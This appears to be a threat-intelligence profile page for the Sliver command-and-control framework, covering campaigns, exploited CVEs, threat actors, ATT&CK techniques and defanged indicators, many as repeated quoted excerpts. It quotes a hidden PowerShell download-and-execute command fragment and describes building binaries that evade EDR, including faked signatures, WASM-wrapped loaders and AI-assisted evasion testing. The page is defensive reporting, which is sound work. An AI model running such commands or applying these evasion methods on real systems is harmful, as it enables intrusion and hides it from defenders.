Sliver
Sliver is an open-source, cross-platform adversary emulation and post-exploitation command-and-control framework, often described as an open-source alternative to Cobalt Strike. It is capable of generating implants/beacons for multiple platforms including Windows, macOS, Linux, and ARM/x86 variants, and is used both legitimately for security testing and abusively by threat actors for long-term remote access and post-compromise operations. Reported capabilities in the provided content include encrypted C2 using mutual TLS and RSA key exchange, payload encoding such as gzip and hex-to-ASCII, periodic beaconing for tasking, file exfiltration via download functionality, and use as an implant dropped or loaded in memory by other malware. The content also notes Sliver implants compiled with garble obfuscation and use of signed or obfuscated builds.
Observed delivery and execution patterns in the content include Bumblebee dropping Sliver payloads; deployment through DLL side-loading where a malicious appwiz.cpl loaded by Fondue.exe injected a Sliver implant into memory; shell scripts downloading architecture-specific Sliver binaries; and exploitation chains such as React2Shell leading to Sliver installation on Linux systems. Specific persistence and infrastructure details directly mentioned include a Sliver implant downloaded from keep.camdvr[.]org:8000/BREAKABLE_PARABLE5 that connected to keep.camdvr[.]org and persisted as /usr/bin/sshd-agent via systemd or through user-space crontab and .bashrc entries; and a Versatile Werewolf campaign in which the Sliver implant contacted curtainbeatdisturbance[.]com, created the mutex MediumTurquoiseBeige, and persisted via a scheduled task named in the format MicrosoftEdgeUpdateTaskMachineUA{GUID}. Additional filenames associated with Sliver beacons in the content include update.bin, update-386.bin, and update-arm.bin.
Threat actor and campaign associations explicitly mentioned in the content include use by DEV-0237 and DEV-0401 as a replacement for Cobalt Strike in some ransomware-linked intrusions; prioritization of Sliver by the Royal ransomware ecosystem as an alternative to Cobalt Strike; use in China-linked ToolShell exploitation alongside ShadowPad, Zingdoor, and KrustyLoader; deployment in Russian-targeted React2Shell exploitation; and use or discussion alongside other offensive frameworks such as Havoc, Covenant, Mythic, Brute Ratel, and GC2. The content also references Sliver C2 servers hosted on Ubuntu in attacker labs, Palo Alto firewall exploitation cases using Sliver for external communication, and PCPJack-associated tooling deploying Sliver beacons during credential theft operations. Overall, the provided material consistently characterizes Sliver as a widely abused post-exploitation/C2 framework used across espionage, ransomware, botnet, and intrusion operations.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
React2Shell in Russia: ... In some cases, the final payloads were the Kaiji and Rustobot botnets and the Sliver implant.
More recently, at the end of November, Darktrace analysts observed a spike in exploitation and post-exploitation activity affecting, once again, Palo Alto firewall devices in the days following the disclosure of the CVE 2024-0012 and CVE-2024-9474 vulnerabilities. ... CVE 2024-0012 is an authentication bypass vulnerability affecting unpatched versions of Palo Alto Networks Next-Generation Firewalls. | Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication. An open-source alternative to Cobalt Strike, this framework has been increasingly popular among threat actors, enabling the generation of dynamic payloads (“slivers”) for multiple platforms, including Windows, MacOS, Linux.
Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication. An open-source alternative to Cobalt Strike, this framework has been increasingly popular among threat actors, enabling the generation of dynamic payloads (“slivers”) for multiple platforms, including Windows, MacOS, Linux. | More recently, at the end of November, Darktrace analysts observed a spike in exploitation and post-exploitation activity affecting, once again, Palo Alto firewall devices in the days following the disclosure of the CVE 2024-0012 and CVE-2024-9474 vulnerabilities. ... CVE-2024-9474 is a privilege escalation vulnerability that allows a PAN-OS administrator with access to the management web interface to execute root-level commands, granting full control over the affected device.
Check Point researchers said the tool is being discussed on underground forums, where hackers are exchanging instructions on how to deploy it against three Citrix NetScaler flaws disclosed last week: CVE-2025-7775, CVE-2025-7776 and CVE-2025-8424. The most critical of these, CVE-2025-7775, allows unauthenticated remote code execution.
In another cluster of activity, since at least March 5, 2026, Sliver, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename “CWan”.
In another cluster of activity, since at least March 5, 2026, Sliver, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename “CWan”.
In another cluster of activity, since at least March 5, 2026, Sliver, an open-source adversarial emulation framework (aka red-teaming implant), was deployed with the filename “CWan”.
CVE-2026-20182 carries a CVSSv3.1 score of 10.0 (Critical) and is classified under CWE-287: Improper Authentication. The flaw affects the Cisco Catalyst SD-WAN Controller (formerly vSmart)... The peering authentication mechanism is not functioning correctly, allowing an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on the affected system.
Analysis of react.py This script is clearly set to exploit CVE-2025-29927, also known as React2Shell. ... This script implements a fully automated React/Next.js exploitation pipeline centered on abusing CVE-2025-29927 to achieve remote command execution at scale.
“KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor. It then decrypts this payload… and injects it directly into memory as shellcode…” | On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems.
On Thursday, May 15, 2025, Ivanti disclosed two critical vulnerabilities - CVE-2025-4427 and CVE-2025-4428 - affecting Ivanti Endpoint Manager Mobile (EPMM) version 12.5.0.0 and earlier. These vulnerabilities can be chained to achieve unauthenticated remote code execution (RCE) on exposed systems. | “KrustyLoader retrieves a second-stage payload — an AES-128-CFB encrypted version of the Sliver backdoor. It then decrypts this payload… and injects it directly into memory as shellcode…”
Figure 3: Upgrade Netcat Connection to Sliver Implant ... Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials.
Figure 3: Upgrade Netcat Connection to Sliver Implant ... Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials.
KrustyLoader, which is typically used for dropping Sliver backdoors.
Figure 3: Upgrade Netcat Connection to Sliver Implant ... Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials.
KrustyLoader, which is typically used for dropping Sliver backdoors.
"On some machines, the attackers deployed Sliver framework, an implant that provided them with full remote control of compromised systems."
“we found… backdoors… starting with the Sliver implant… Both download Sliver implants, and both connected back to the same server…”
In versions 1.5.43 and earlier, the netstack does not limit traffic between Wireguard clients... https://hngnh.com/posts/Sliver-CVE-2025-27093/
Groups observed using it
29 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The appwiz.cpl applet is packed with UPX and obfuscated with Oreans Code Virtualizer... The applet loading results in the deployment of a Sliver post-exploitation framework implant within the Fondue.exe memory.
DEV-0237 now uses the SystemBC RAT and the penetration testing framework Sliver in their attacks, replacing Cobalt Strike. ... Around June 6, 2022, it began replacing Cobalt Strike with the Sliver framework in their attacks.
DEV-0237 now uses the SystemBC RAT and the penetration testing framework Sliver in their attacks, replacing Cobalt Strike. ... Around June 6, 2022, it began replacing Cobalt Strike with the Sliver framework in their attacks.
The multi-stage attack chain deployed EchoGather RAT via Telegram channels and phishing pages, Sliver implant via DLL side-loading through Fondue.exe, SoullessRAT via fake AlphaFly installer, and AquilaRAT (Rust backdoor) leveraging multiple rotating C2 domains.
UNC5174 has been observed using SNOWLIGHT to download Sliver and VSHELL.
IP 67.217.57[.]240 December 2025 Sliver C2 infrastructure
Sliver, an open-source, cross-platform adversary simulation and C2 framework originally designed for red team and penetration testing, enables command-and-control over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS...
Sliver, an open-source, cross-platform adversary simulation and C2 framework originally designed for red team and penetration testing, enables command-and-control over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS...
Sliver, an open-source, cross-platform adversary simulation and C2 framework originally designed for red team and penetration testing, enables command-and-control over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS...
China-nexus groups (i.e., Earth Lamia, Jackpot Panda, UNC5174) deploying Cobalt Strike beacons, Sliver, and Vshell backdoors
China-nexus groups (i.e., Earth Lamia, Jackpot Panda, UNC5174) deploying Cobalt Strike beacons, Sliver, and Vshell backdoors
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
Also dropped are Sliver, TinyShell (a Unix backdoor), keyloggers, and brute-force utilities to facilitate credential harvesting and lateral movement.
KrustyLoader, which is typically used for dropping Sliver backdoors.
During analysis, researchers found that this binary is a payload generated with Sliver. Sliver is an open source cross-platform adversary emulation/red team framework...
...retrieved and decrypted a hidden payload—a remote access tool (RAT) based on Sliver, an open-source command-and-control framework.
...retrieved and decrypted a hidden payload—a remote access tool (RAT) based on Sliver, an open-source command-and-control framework.
...retrieved and decrypted a hidden payload—a remote access tool (RAT) based on Sliver, an open-source command-and-control framework.
...retrieved and decrypted a hidden payload—a remote access tool (RAT) based on Sliver, an open-source command-and-control framework.
Sliver is an open-source cross-platform C2 framework written in Golang and designed for organizations to perform security testing.
Sliver is an open-source cross-platform C2 framework written in Golang and designed for organizations to perform security testing.
ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel.
"...utilizing tools such as the open-source Sliver and their custom DTrack malware to move laterally and maintain persistence..."
“The primary C2 frameworks observed were Cobalt Strike, VShell, Havoc, Sliver, and SparkRat.”
"The group also used tooling such as Cobalt Strike, Sliver, and multiple web shells..."
“The attackers attempted to use a Sliver shell implant to elevate privileges.”
Several days later, on March 2, our network scans identified a Sliver C2 server on port 31337.
Techniques & procedures
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.
Initial Access
2 techniquesAt that point, they captured a victim’s credentials, which led them to query Active Directory.
Soon enough, an Initial Access Broker (IAB) ... used a phishing campaign and executed offensive hacking tool Sliver on the endpoint.
Execution
6 techniquesThe malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
A framework created by cybersecurity researcher Muhammad Osama supports automated penetration testing. Dubbed HexStrike-AI, it connects large language models to more than 150 existing security tools, running them in sequence with retry logic and error recovery.
run-script.ps1, a PowerShell script to load and execute code via PowerShell. The file contains: powershell -w hidden -ep bypass -c "I''E''X...DOWNLOADDaTa(...)"
The infection begins with bootstrap.sh, a shell script designed for Linux systems. This script serves only to set up the environment and download additional payloads.
helper.vbs, a VBS file ... that executes run-script.ps1.
The URL hxxps://battleflight[.]org/download/installer hosted the executable BattleFlight-Install-v11.0.3.exe, a C# dropper disguised as an installer for a drone pilot training simulator.
Persistence
2 techniquesThe malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
Privilege Escalation
3 techniquesThe malicious applet also creates a task in Windows Task Scheduler to gain persistence in the system. The task name has the following format: MicrosoftEdgeUpdateTaskMachineUA{GUID}.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
Stealth
8 techniquesNormally this is the point when we start changing strings and hoping for the best... Maybe the entropy in your binary is off because you wanted to use compression... Maybe the file needs some kind of spoofed Authenticode signature... we need to spend time hardening our binaries against static analysis.
This post is about that loader, which we call WasmForge ... You point it at a Go project and you get back a Windows or macOS binary that runs your tool but doesn’t look anything like it ... The third generates an outer Go binary containing a Wazero runtime, embeds the encrypted WASM module into the binary’s PE sections.
The loader compiles the original tool to WebAssembly, wraps it in a runtime that proxies syscalls and Win32 APIs back to the host, and ships the WASM payload encrypted inside an outer Go binary disguised as a real piece of infrastructure software.
Once we had a working ghost-profile pipeline producing reliably clean binaries... The loader compiles the original tool to WebAssembly, wraps it in a runtime... and ships the WASM payload encrypted inside an outer Go binary disguised as a real piece of infrastructure software.
BUMBLEBEE has Rabbort.DLL embedded, using it for process injection... shi Injects task’s data into a new process... dij Injects task’s data into a new process.
At that point, they captured a victim’s credentials, which led them to query Active Directory.
the C# dropper contains the EchoGather payload, which is Base64-encoded and XOR-encrypted.
Sliver – We tested ... execute-assembly against Seatbelt and Rubeus ... Watching execute-assembly Rubeus.exe kerberoast complete successfully against a domain controller, through a WASM-bridged COM call into the CLR running a loaded Rubeus assembly, was significantly more rewarding ...
Defense Impairment
1 techniqueMaybe the file needs some kind of spoofed Authenticode signature... Last month one of our build pipelines to obfuscate Sliver started getting hit at 100% by AhnLab... every single binary that we’d faked a digital signature for was detected with that exact rule.
Discovery
1 techniqueSliver – We tested beacon and session implants ... file I/O, process listing ... Tribunus ... standard commands like shell, ps, netstat, whoami .
Command and Control
10 techniquesURI patterns and PCAPs analysis yielded evidence of both English word type encoding within Sliver and Gzip formatting.
Some Backdoor.Oldrea samples use standard Base64 + bzip2... gh0st RAT has used Zlib to compress C2 communications data before encrypting it... HOPLIGHT has utilized Zlib compression to obfuscate the communications payload.
These included customized Cobalt Strike profiles designed to mimic legitimate web traffic. Telegram bot–based command-and-control channel to hide communications within trusted infrastructure. A Cloudflare Worker was also used as a redirector to obscure the true backend C2 server.
Palo Alto firewalls likely exploited via the newly disclosed CVEs would commonly utilize the Sliver C2 platform for external communication... multiple devices contacted the Sliver-linked IP address 77.221.158[.]154 using HTTP to retrieve Gzip files.
По MITRE ATT&CK это конкретные техники: Proxy ( T1090, Command and Control ) - маршрутизация C2-трафика через промежуточный узел
The whole pipeline exists to solve one specific problem: take an existing offensive security tool, change zero lines of its source code, and produce a binary you can actually drop on a hardened endpoint.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
The applet loading results in the deployment of a Sliver post-exploitation framework implant within the Fondue.exe memory.
External connectivity during this phase also featured TCP connection attempts over uncommon ports for common application protocols... devices utilized destination ports such as 8089, 3939, 8880, 8084, and 9999 for the HTTP protocol.
Several targeted customer devices were observed initiating TLS/SSL connections to rare external IPs with self-signed TLS certificates following exploitation... These TLS/SSL sessions were typically established without the specification of a Server Name Indication (SNI).
Exfiltration
1 techniqueADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Other
2 techniquesSophos X-Ops analysts observed a threat actor using artificial intelligence (AI) technologies to test endpoint detection and response (EDR) evasion tactics in a “red team” post-exploitation framework.
The activity was detected when an anomalous endpoint registered within a customer tenant triggered alerts... indicative of a broader attack framework focused on evading detection... a lab that uses an iterative approach to developing and testing malware against the Sophos, CrowdStrike, and Windows Defender endpoint detection and response (EDR) agents.
IOCs tracked for this family
104 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
157 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Used as a command-and-control server within the attacker’s lab environment to support post-exploitation testing and operations.
A post-exploitation command-and-control framework used here as the C2 server within the attacker’s testing environment.
Referenced as a command-and-control framework associated with application-layer C2 traffic that can be masked to evade ML-based IDS detection.
Command-and-control implant/framework that periodically checks in for commands and can shape traffic to resemble legitimate applications.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.